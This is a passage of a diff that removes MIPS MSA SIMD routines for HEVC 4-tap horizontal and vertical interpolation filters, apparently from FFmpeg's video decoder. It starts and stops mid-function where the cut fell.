filter_vec, const_vec; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr + 16); - - src -= 1; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - mask1 = mask0 + 2; - - 
const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - LD_SB4(src, src_stride, src0, src1, src2, src3); - XORI_B4_128_SB(src0, src1, src2, src3); - - VSHF_B2_SB(src0, src1, src0, src1, mask0, mask1, vec0, vec1); - dst0 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - - VSHF_B2_SB(src2, src3, src2, src3, mask0, mask1, vec0, vec1); - dst1 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst1, dst1); - - ST_D4(dst0, dst1, 0, 1, 0, 1, dst, dst_stride); -} - -static void hevc_hz_4t_4x8multiple_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - uint32_t loop_cnt; - v8i16 filt0, filt1; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v16i8 mask1, vec0, vec1; - v8i16 dst0, dst1, dst2, dst3; - v8i16 filter_vec, const_vec; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr + 16); - - src -= 1; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - for (loop_cnt = (height >> 3); loop_cnt--;) { - LD_SB8(src, src_stride, src0, src1, src2, src3, src4, src5, src6, src7); - src += (8 * src_stride); - - XORI_B8_128_SB(src0, src1, src2, src3, src4, src5, src6, src7); - - VSHF_B2_SB(src0, src1, src0, src1, mask0, mask1, vec0, vec1); - dst0 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - VSHF_B2_SB(src2, src3, src2, src3, mask0, mask1, vec0, vec1); - dst1 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst1, dst1); - VSHF_B2_SB(src4, src5, src4, src5, mask0, mask1, vec0, vec1); - dst2 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst2, dst2); - VSHF_B2_SB(src6, src7, src6, src7, mask0, mask1, vec0, vec1); - dst3 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst3, dst3); - - ST_D8(dst0, dst1, dst2, dst3, 0, 1, 0, 1, 0, 1, 0, 1, dst, dst_stride); - dst += (8 * dst_stride); - } -} - -static void hevc_hz_4t_4w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - if (2 == height) { - hevc_hz_4t_4x2_msa(src, src_stride, dst, dst_stride, filter); - } else if (4 == height) { - hevc_hz_4t_4x4_msa(src, src_stride, dst, dst_stride, filter); - } else if (0 == height % 8) { - hevc_hz_4t_4x8multiple_msa(src, src_stride, dst, dst_stride, - filter, height); - } -} - -static void hevc_hz_4t_6w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - uint32_t loop_cnt; - uint64_t dst_val0, dst_val1, dst_val2, dst_val3; - uint32_t dst_val_int0, dst_val_int1, dst_val_int2, dst_val_int3; - v8i16 filt0, filt1, dst0, dst1, dst2, dst3; - v16i8 src0, src1, src2, src3; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - v16i8 mask1; - v16i8 vec0, vec1; - v8i16 filter_vec, const_vec; - - src -= 1; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - for (loop_cnt = 2; loop_cnt--;) { - LD_SB4(src, src_stride, src0, src1, src2, src3); - src += (4 * src_stride); - - XORI_B4_128_SB(src0, src1, src2, src3); - - VSHF_B2_SB(src0, src0, src0, src0, mask0, mask1, vec0, vec1); - dst0 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - VSHF_B2_SB(src1, src1, src1, src1, mask0, mask1, vec0, vec1); - dst1 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst1, dst1); - VSHF_B2_SB(src2, src2, src2, src2, mask0, mask1, vec0, vec1); - dst2 = 
const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst2, dst2); - VSHF_B2_SB(src3, src3, src3, src3, mask0, mask1, vec0, vec1); - dst3 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst3, dst3); - - dst_val0 = __msa_copy_u_d((v2i64) dst0, 0); - dst_val1 = __msa_copy_u_d((v2i64) dst1, 0); - dst_val2 = __msa_copy_u_d((v2i64) dst2, 0); - dst_val3 = __msa_copy_u_d((v2i64) dst3, 0); - - dst_val_int0 = __msa_copy_u_w((v4i32) dst0, 2); - dst_val_int1 = __msa_copy_u_w((v4i32) dst1, 2); - dst_val_int2 = __msa_copy_u_w((v4i32) dst2, 2); - dst_val_int3 = __msa_copy_u_w((v4i32) dst3, 2); - - SD(dst_val0, dst); - SW(dst_val_int0, dst + 4); - dst += dst_stride; - SD(dst_val1, dst); - SW(dst_val_int1, dst + 4); - dst += dst_stride; - SD(dst_val2, dst); - SW(dst_val_int2, dst + 4); - dst += dst_stride; - SD(dst_val3, dst); - SW(dst_val_int3, dst + 4); - dst += dst_stride; - } -} - -static void hevc_hz_4t_8x2multiple_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - uint32_t loop_cnt; - v8i16 filt0, filt1, dst0, dst1; - v16i8 src0, src1; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - v16i8 mask1; - v16i8 vec0, vec1; - v8i16 filter_vec, const_vec; - - src -= 1; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - for (loop_cnt = (height >> 1); loop_cnt--;) { - LD_SB2(src, src_stride, src0, src1); - src += (2 * src_stride); - - XORI_B2_128_SB(src0, src1); - - VSHF_B2_SB(src0, src0, src0, src0, mask0, mask1, vec0, vec1); - dst0 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - - VSHF_B2_SB(src1, src1, src1, src1, mask0, mask1, vec0, vec1); - dst1 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst1, dst1); - - ST_SH2(dst0, dst1, dst, dst_stride); - dst += (2 * dst_stride); - } -} - -static void hevc_hz_4t_8x4multiple_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - uint32_t loop_cnt; - v8i16 filt0, filt1; - v16i8 src0, src1, src2, src3; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - v16i8 mask1; - v16i8 vec0, vec1; - v8i16 dst0, dst1, dst2, dst3; - v8i16 filter_vec, const_vec; - - src -= 1; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB4(src, src_stride, src0, src1, src2, src3); - src += (4 * src_stride); - - XORI_B4_128_SB(src0, src1, src2, src3); - - VSHF_B2_SB(src0, src0, src0, src0, mask0, mask1, vec0, vec1); - dst0 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - - VSHF_B2_SB(src1, src1, src1, src1, mask0, mask1, vec0, vec1); - dst1 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst1, dst1); - - VSHF_B2_SB(src2, src2, src2, src2, mask0, mask1, vec0, vec1); - dst2 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst2, dst2); - - VSHF_B2_SB(src3, src3, src3, src3, mask0, mask1, vec0, vec1); - dst3 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst3, dst3); - - ST_SH4(dst0, dst1, dst2, dst3, dst, dst_stride); - dst += (4 * dst_stride); - } -} - -static void hevc_hz_4t_8w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - if (2 == height || 6 == height) { - hevc_hz_4t_8x2multiple_msa(src, src_stride, dst, dst_stride, - filter, height); - 
} else { - hevc_hz_4t_8x4multiple_msa(src, src_stride, dst, dst_stride, - filter, height); - } -} - -static void hevc_hz_4t_12w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - uint32_t loop_cnt; - v8i16 filt0, filt1; - v16i8 src0, src1, src2, src3; - v16i8 mask1; - v16i8 vec0, vec1; - v8i16 dst0, dst1, dst2, dst3, dst4, dst5; - v8i16 filter_vec, const_vec; - v16i8 mask3; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - v16i8 mask2 = { - 8, 9, 9, 10, 10, 11, 11, 12, 24, 25, 25, 26, 26, 27, 27, 28 - }; - - src -= 1; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - mask1 = mask0 + 2; - mask3 = mask2 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB4(src, src_stride, src0, src1, src2, src3); - src += (4 * src_stride); - XORI_B4_128_SB(src0, src1, src2, src3); - - VSHF_B2_SB(src0, src0, src0, src0, mask0, mask1, vec0, vec1); - dst0 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - VSHF_B2_SB(src1, src1, src1, src1, mask0, mask1, vec0, vec1); - dst1 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst1, dst1); - VSHF_B2_SB(src2, src2, src2, src2, mask0, mask1, vec0, vec1); - dst2 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst2, dst2); - VSHF_B2_SB(src3, src3, src3, src3, mask0, mask1, vec0, vec1); - dst3 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst3, dst3); - VSHF_B2_SB(src0, src1, src0, src1, mask2, mask3, vec0, vec1); - dst4 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst4, dst4); - VSHF_B2_SB(src2, src3, src2, src3, mask2, mask3, vec0, vec1); - dst5 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst5, dst5); - - ST_SH4(dst0, dst1, dst2, dst3, dst, dst_stride); - ST_D4(dst4, dst5, 0, 1, 0, 1, dst + 8, dst_stride); - dst += (4 * dst_stride); - } -} - -static void hevc_hz_4t_16w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - uint32_t loop_cnt; - v16i8 src0, src1, src2, src3; - v16i8 src4, src5, src6, src7; - v8i16 filt0, filt1; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - v16i8 mask1; - v8i16 dst0, dst1, dst2, dst3, dst4, dst5, dst6, dst7; - v16i8 vec0, vec1; - v8i16 filter_vec, const_vec; - - src -= 1; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB4(src, src_stride, src0, src2, src4, src6); - LD_SB4(src + 8, src_stride, src1, src3, src5, src7); - src += (4 * src_stride); - - XORI_B8_128_SB(src0, src1, src2, src3, src4, src5, src6, src7); - - VSHF_B2_SB(src0, src0, src0, src0, mask0, mask1, vec0, vec1); - dst0 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - - VSHF_B2_SB(src1, src1, src1, src1, mask0, mask1, vec0, vec1); - dst1 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst1, dst1); - - VSHF_B2_SB(src2, src2, src2, src2, mask0, mask1, vec0, vec1); - dst2 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst2, dst2); - - VSHF_B2_SB(src3, src3, src3, src3, mask0, mask1, vec0, vec1); - dst3 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst3, dst3); - - VSHF_B2_SB(src4, src4, src4, src4, mask0, mask1, vec0, vec1); - dst4 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst4, dst4); - - VSHF_B2_SB(src5, src5, src5, src5, mask0, mask1, vec0, vec1); - dst5 = const_vec; - 
DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst5, dst5); - - VSHF_B2_SB(src6, src6, src6, src6, mask0, mask1, vec0, vec1); - dst6 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst6, dst6); - - VSHF_B2_SB(src7, src7, src7, src7, mask0, mask1, vec0, vec1); - dst7 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst7, dst7); - - ST_SH4(dst0, dst2, dst4, dst6, dst, dst_stride); - ST_SH4(dst1, dst3, dst5, dst7, dst + 8, dst_stride); - dst += (4 * dst_stride); - } -} - -static void hevc_hz_4t_24w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - uint32_t loop_cnt; - int16_t *dst_tmp = dst + 16; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v8i16 filt0, filt1; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - v16i8 mask1, mask00, mask11; - v16i8 vec0, vec1; - v8i16 dst0, dst1, dst2, dst3; - v8i16 filter_vec, const_vec; - - src -= 1; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - mask1 = mask0 + 2; - mask00 = mask0 + 8; - mask11 = mask0 + 10; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - for (loop_cnt = (height >> 2); loop_cnt--;) { - /* 16 width */ - LD_SB4(src, src_stride, src0, src2, src4, src6); - LD_SB4(src + 16, src_stride, src1, src3, src5, src7); - src += (4 * src_stride); - - XORI_B8_128_SB(src0, src1, src2, src3, src4, src5, src6, src7); - - VSHF_B2_SB(src0, src0, src0, src0, mask0, mask1, vec0, vec1); - dst0 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - - VSHF_B2_SB(src0, src1, src0, src1, mask00, mask11, vec0, vec1); - dst1 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst1, dst1); - - VSHF_B2_SB(src2, src2, src2, src2, mask0, mask1, vec0, vec1); - dst2 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst2, dst2); - - VSHF_B2_SB(src2, src3, src2, src3, mask00, mask11, vec0, vec1); - dst3 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst3, dst3); - - ST_SH2(dst0, dst1, dst, 8); - dst += dst_stride; - ST_SH2(dst2, dst3, dst, 8); - dst += dst_stride; - - VSHF_B2_SB(src4, src4, src4, src4, mask0, mask1, vec0, vec1); - dst0 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - - VSHF_B2_SB(src4, src5, src4, src5, mask00, mask11, vec0, vec1); - dst1 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst1, dst1); - - VSHF_B2_SB(src6, src6, src6, src6, mask0, mask1, vec0, vec1); - dst2 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst2, dst2); - - VSHF_B2_SB(src6, src7, src6, src7, mask00, mask11, vec0, vec1); - dst3 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst3, dst3); - - ST_SH2(dst0, dst1, dst, 8); - dst += dst_stride; - ST_SH2(dst2, dst3, dst, 8); - dst += dst_stride; - - /* 8 width */ - VSHF_B2_SB(src1, src1, src1, src1, mask0, mask1, vec0, vec1); - dst0 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst0, dst0); - - VSHF_B2_SB(src3, src3, src3, src3, mask0, mask1, vec0, vec1); - dst1 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst1, dst1); - - VSHF_B2_SB(src5, src5, src5, src5, mask0, mask1, vec0, vec1); - dst2 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst2, dst2); - - VSHF_B2_SB(src7, src7, src7, src7, mask0, mask1, vec0, vec1); - dst3 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst3, dst3); - - ST_SH4(dst0, dst1, dst2, dst3, dst_tmp, dst_stride); - dst_tmp += (4 * dst_stride); - } -} - -static void hevc_hz_4t_32w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - 
int32_t height) -{ - uint32_t loop_cnt; - v16i8 src0, src1, src2; - v8i16 filt0, filt1; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - v16i8 mask1, mask2, mask3; - v8i16 dst0, dst1, dst2, dst3; - v16i8 vec0, vec1, vec2, vec3; - v8i16 filter_vec, const_vec; - - src -= 1; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - mask1 = mask0 + 2; - mask2 = mask0 + 8; - mask3 = mask0 + 10; - - for (loop_cnt = height; loop_cnt--;) { - LD_SB2(src, 16, src0, src1); - src2 = LD_SB(src + 24); - src += src_stride; - - XORI_B3_128_SB(src0, src1, src2); - - dst0 = const_vec; - dst1 = const_vec; - dst2 = const_vec; - dst3 = const_vec; - VSHF_B2_SB(src0, src0, src0, src1, mask0, mask2, vec0, vec1); - VSHF_B2_SB(src1, src1, src2, src2, mask0, mask0, vec2, vec3); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt0, filt0, filt0, dst0, - dst1, dst2, dst3); - VSHF_B2_SB(src0, src0, src0, src1, mask1, mask3, vec0, vec1); - VSHF_B2_SB(src1, src1, src2, src2, mask1, mask1, vec2, vec3); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt1, filt1, filt1, filt1, dst0, - dst1, dst2, dst3); - ST_SH4(dst0, dst1, dst2, dst3, dst, 8); - dst += dst_stride; - } -} - -static void hevc_vt_4t_4x2_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter) -{ - v16i8 src0, src1, src2, src3, src4; - v16i8 src10_r, src32_r, src21_r, src43_r; - v16i8 src2110, src4332; - v8i16 dst10; - v8i16 filt0, filt1; - v8i16 filter_vec, const_vec; - - src -= src_stride; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - LD_SB5(src, src_stride, src0, src1, src2, src3, src4); - ILVR_B4_SB(src1, src0, src2, src1, src3, src2, src4, src3, - src10_r, src21_r, src32_r, src43_r); - - ILVR_D2_SB(src21_r, src10_r, src43_r, src32_r, src2110, src4332); - XORI_B2_128_SB(src2110, src4332); - dst10 = const_vec; - DPADD_SB2_SH(src2110, src4332, filt0, filt1, dst10, dst10); - - ST_D2(dst10, 0, 1, dst, dst_stride); -} - -static void hevc_vt_4t_4x4_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - v16i8 src0, src1, src2, src3, src4, src5, src6; - v16i8 src10_r, src32_r, src54_r, src21_r, src43_r, src65_r; - v16i8 src2110, src4332, src6554; - v8i16 dst10, dst32; - v8i16 filt0, filt1; - v8i16 filter_vec, const_vec; - - src -= src_stride; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - LD_SB7(src, src_stride, src0, src1, src2, src3, src4, src5, src6); - ILVR_B4_SB(src1, src0, src2, src1, src3, src2, src4, src3, - src10_r, src21_r, src32_r, src43_r); - ILVR_B2_SB(src5, src4, src6, src5, src54_r, src65_r); - ILVR_D3_SB(src21_r, src10_r, src43_r, src32_r, src65_r, src54_r, - src2110, src4332, src6554); - XORI_B3_128_SB(src2110, src4332, src6554); - dst10 = const_vec; - DPADD_SB2_SH(src2110, src4332, filt0, filt1, dst10, dst10); - dst32 = const_vec; - DPADD_SB2_SH(src4332, src6554, filt0, filt1, dst32, dst32); - - ST_D4(dst10, dst32, 0, 1, 0, 1, dst, dst_stride); -} - -static void hevc_vt_4t_4x8_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - v16i8 src0, src1, src2, src3, src4, src5, src6, src7, src8, src9, src10; - v16i8 src10_r, src32_r, src54_r, src76_r, src98_r; - v16i8 src21_r, src43_r, src65_r, src87_r, 
src109_r; - v16i8 src2110, src4332, src6554, src8776, src10998; - v8i16 dst10, dst32, dst54, dst76; - v8i16 filt0, filt1; - v8i16 filter_vec, const_vec; - - src -= src_stride; - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - LD_SB3(src, src_stride, src0, src1, src2); - src += (3 * src_stride); - - ILVR_B2_SB(src1, src0, src2, src1, src10_r, src21_r); - src2110 = (v16i8) __msa_ilvr_d((v2i64) src21_r, (v2i64) src10_r); - src2110 = (v16i8) __msa_xori_b((v16u8) src2110, 128); - - LD_SB8(src, src_stride, src3, src4, src5, src6, src7, src8, src9, src10); - src += (8 * src_stride); - ILVR_B4_SB(src3, src2, src4, src3, src5, src4, src6, src5, - src32_r, src43_r, src54_r, src65_r); - ILVR_B4_SB(src7, src6, src8, src7, src9, src8, src10, src9, - src76_r, src87_r, src98_r, src109_r); - ILVR_D4_SB(src43_r, src32_r, src65_r, src54_r, src87_r, src76_r, src109_r, - src98_r, src4332, src6554, src8776, src10998); - XORI_B4_128_SB(src4332, src6554, src8776, src10998); - dst10 = const_vec; - dst32 = const_vec; - dst54 = const_vec; - dst76 = const_vec; - DPADD_SB2_SH(src2110, src4332, filt0, filt1, dst10, dst10); - DPADD_SB2_SH(src4332, src6554, filt0, filt1, dst32, dst32); - DPADD_SB2_SH(src6554, src8776, filt0, filt1, dst54, dst54); - DPADD_SB2_SH(src8776, src10998, filt0, filt1, dst76, dst76); - ST_D8(dst10, dst32, dst54, dst76, 0, 1, 0, 1, 0, 1, 0, 1, dst, dst_stride); -} - -static void hevc_vt_4t_4x16_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - v16i8 src0, src1, src2, src3, src4, src5, src6, src7, src8, src9, src10; - v16i8 src10_r, src32_r, src54_r, src76_r, src98_r, src21_r, src43_r; - v16i8 src65_r, src87_r, src109_r, src2110, src4332, src6554, src8776; - v16i8 src10998; - v8i16 dst10, dst32, dst54, dst76, filt0, filt1, filter_vec, const_vec; - - src -= src_stride; - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - LD_SB3(src, src_stride, src0, src1, src2); - src += (3 * src_stride); - - ILVR_B2_SB(src1, src0, src2, src1, src10_r, src21_r); - src2110 = (v16i8) __msa_ilvr_d((v2i64) src21_r, (v2i64) src10_r); - src2110 = (v16i8) __msa_xori_b((v16u8) src2110, 128); - - LD_SB8(src, src_stride, src3, src4, src5, src6, src7, src8, src9, src10); - src += (8 * src_stride); - ILVR_B4_SB(src3, src2, src4, src3, src5, src4, src6, src5, src32_r, src43_r, - src54_r, src65_r); - ILVR_B4_SB(src7, src6, src8, src7, src9, src8, src10, src9, src76_r, - src87_r, src98_r, src109_r); - ILVR_D4_SB(src43_r, src32_r, src65_r, src54_r, src87_r, src76_r, src109_r, - src98_r, src4332, src6554, src8776, src10998); - XORI_B4_128_SB(src4332, src6554, src8776, src10998); - - dst10 = const_vec; - dst32 = const_vec; - dst54 = const_vec; - dst76 = const_vec; - DPADD_SB2_SH(src2110, src4332, filt0, filt1, dst10, dst10); - DPADD_SB2_SH(src4332, src6554, filt0, filt1, dst32, dst32); - DPADD_SB2_SH(src6554, src8776, filt0, filt1, dst54, dst54); - DPADD_SB2_SH(src8776, src10998, filt0, filt1, dst76, dst76); - ST_D8(dst10, dst32, dst54, dst76, 0, 1, 0, 1, 0, 1, 0, 1, dst, dst_stride); - dst += (8 * dst_stride); - - src2 = src10; - src2110 = src10998; - - LD_SB8(src, src_stride, src3, src4, src5, src6, src7, src8, src9, src10); - src += (8 * src_stride); - - ILVR_B4_SB(src3, src2, src4, src3, src5, src4, src6, src5, src32_r, src43_r, - src54_r, src65_r); - ILVR_B4_SB(src7, src6, src8, src7, 
src9, src8, src10, src9, src76_r, - src87_r, src98_r, src109_r); - ILVR_D4_SB(src43_r, src32_r, src65_r, src54_r, src87_r, src76_r, src109_r, - src98_r, src4332, src6554, src8776, src10998); - XORI_B4_128_SB(src4332, src6554, src8776, src10998); - - dst10 = const_vec; - dst32 = const_vec; - dst54 = const_vec; - dst76 = const_vec; - DPADD_SB2_SH(src2110, src4332, filt0, filt1, dst10, dst10); - DPADD_SB2_SH(src4332, src6554, filt0, filt1, dst32, dst32); - DPADD_SB2_SH(src6554, src8776, filt0, filt1, dst54, dst54); - DPADD_SB2_SH(src8776, src10998, filt0, filt1, dst76, dst76); - ST_D8(dst10, dst32, dst54, dst76, 0, 1, 0, 1, 0, 1, 0, 1, dst, dst_stride); -} - -static void hevc_vt_4t_4w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - if (2 == height) { - hevc_vt_4t_4x2_msa(src, src_stride, dst, dst_stride, filter); - } else if (4 == height) { - hevc_vt_4t_4x4_msa(src, src_stride, dst, dst_stride, filter, height); - } else if (8 == height) { - hevc_vt_4t_4x8_msa(src, src_stride, dst, dst_stride, filter, height); - } else if (16 == height) { - hevc_vt_4t_4x16_msa(src, src_stride, dst, dst_stride, filter, height); - } -} - -static void hevc_vt_4t_6w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - int32_t loop_cnt; - int32_t res = height & 0x03; - uint32_t dst_val_int0, dst_val_int1, dst_val_int2, dst_val_int3; - uint64_t dst_val0, dst_val1, dst_val2, dst_val3; - v16i8 src0, src1, src2, src3, src4; - v16i8 src10_r, src32_r, src21_r, src43_r; - v8i16 dst0_r, dst1_r, dst2_r, dst3_r; - v8i16 filt0, filt1; - v8i16 filter_vec, const_vec; - - src -= src_stride; - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - LD_SB3(src, src_stride, src0, src1, src2); - src += (3 * src_stride); - XORI_B3_128_SB(src0, src1, src2); - ILVR_B2_SB(src1, src0, src2, src1, src10_r, src21_r); - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB2(src, src_stride, src3, src4); - src += (2 * src_stride); - XORI_B2_128_SB(src3, src4); - ILVR_B2_SB(src3, src2, src4, src3, src32_r, src43_r); - - dst0_r = const_vec; - DPADD_SB2_SH(src10_r, src32_r, filt0, filt1, dst0_r, dst0_r); - dst1_r = const_vec; - DPADD_SB2_SH(src21_r, src43_r, filt0, filt1, dst1_r, dst1_r); - - LD_SB2(src, src_stride, src1, src2); - src += (2 * src_stride); - XORI_B2_128_SB(src1, src2); - ILVR_B2_SB(src1, src4, src2, src1, src10_r, src21_r); - - dst2_r = const_vec; - DPADD_SB2_SH(src32_r, src10_r, filt0, filt1, dst2_r, dst2_r); - dst3_r = const_vec; - DPADD_SB2_SH(src43_r, src21_r, filt0, filt1, dst3_r, dst3_r); - - dst_val0 = __msa_copy_u_d((v2i64) dst0_r, 0); - dst_val1 = __msa_copy_u_d((v2i64) dst1_r, 0); - dst_val2 = __msa_copy_u_d((v2i64) dst2_r, 0); - dst_val3 = __msa_copy_u_d((v2i64) dst3_r, 0); - - dst_val_int0 = __msa_copy_u_w((v4i32) dst0_r, 2); - dst_val_int1 = __msa_copy_u_w((v4i32) dst1_r, 2); - dst_val_int2 = __msa_copy_u_w((v4i32) dst2_r, 2); - dst_val_int3 = __msa_copy_u_w((v4i32) dst3_r, 2); - - SD(dst_val0, dst); - SW(dst_val_int0, dst + 4); - dst += dst_stride; - SD(dst_val1, dst); - SW(dst_val_int1, dst + 4); - dst += dst_stride; - SD(dst_val2, dst); - SW(dst_val_int2, dst + 4); - dst += dst_stride; - SD(dst_val3, dst); - SW(dst_val_int3, dst + 4); - dst += dst_stride; - } - if (res) { - LD_SB2(src, src_stride, src3, src4); - XORI_B2_128_SB(src3, src4); - ILVR_B2_SB(src3, src2, src4, src3, 
